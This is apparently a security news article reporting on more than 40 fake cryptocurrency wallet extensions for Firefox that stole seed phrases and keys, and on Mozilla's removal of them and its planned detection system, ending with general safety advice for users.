Over 40 Malicious Firefox Extensions Discovered Targeting Cryptocurrency Users

Introduction to the Threat

Recent investigations by cybersecurity experts have revealed a concerning trend involving more than 40 harmful browser extensions for Mozilla Firefox. These extensions are specifically crafted to compromise cryptocurrency wallets, posing a significant risk to users’ digital assets.

The Nature of the Malicious Extensions

According to Koi Security researcher Yuval Ronen, these deceptive extensions masquerade as legitimate wallet applications from popular platforms, including Coinbase, MetaMask, Trust Wallet, and others. The campaign appears to have been active since at least April 2025, with new malicious extensions surfacing in the Firefox Add-ons store as recently as last week.

Deceptive Tactics Employed

The malicious extensions have been observed to artificially enhance their credibility by generating hundreds of fake 5-star reviews, far exceeding the actual number of installations. This tactic creates a false sense of trust, luring unsuspecting users into downloading them.

Additionally, the attackers have employed branding strategies that mimic legitimate wallet tools, using identical names and logos to further deceive potential victims.

Technical Mechanisms of the Attack

Some of the compromised extensions were based on open-source projects, allowing the attackers to replicate their code and introduce harmful features. These features are designed to capture wallet keys and seed phrases from targeted websites, subsequently sending this sensitive information to a remote server. The rogue extensions also collect and transmit victims’ external IP addresses.

Unlike conventional phishing schemes that rely on fraudulent websites or emails, these extensions operate directly within the user’s browser, making them significantly harder to detect and block using standard security measures.

The Profile of the Threat Actor

The presence of Russian language comments within the source code, along with metadata from a PDF file retrieved from the command-and-control server, suggests that a Russian-speaking cybercriminal group is behind this operation.

Response from Mozilla

All identified malicious extensions, with the exception of MyMonero Wallet, have been removed by Mozilla. The company has announced the development of an “early detection system” aimed at identifying and blocking fraudulent cryptocurrency wallet extensions before they can gain traction and deceive users into revealing their credentials.

Best Practices for Users

To safeguard against such threats, users are advised to only install extensions from verified developers and to thoroughly review them to ensure they do not alter their behavior after installation.

If you found this article informative, consider following us on Twitter and LinkedIn for more exclusive content.

Disclaimer: This article is provided for informational purposes only and does not constitute financial advice. Readers are encouraged to conduct their own research before making any investment decisions.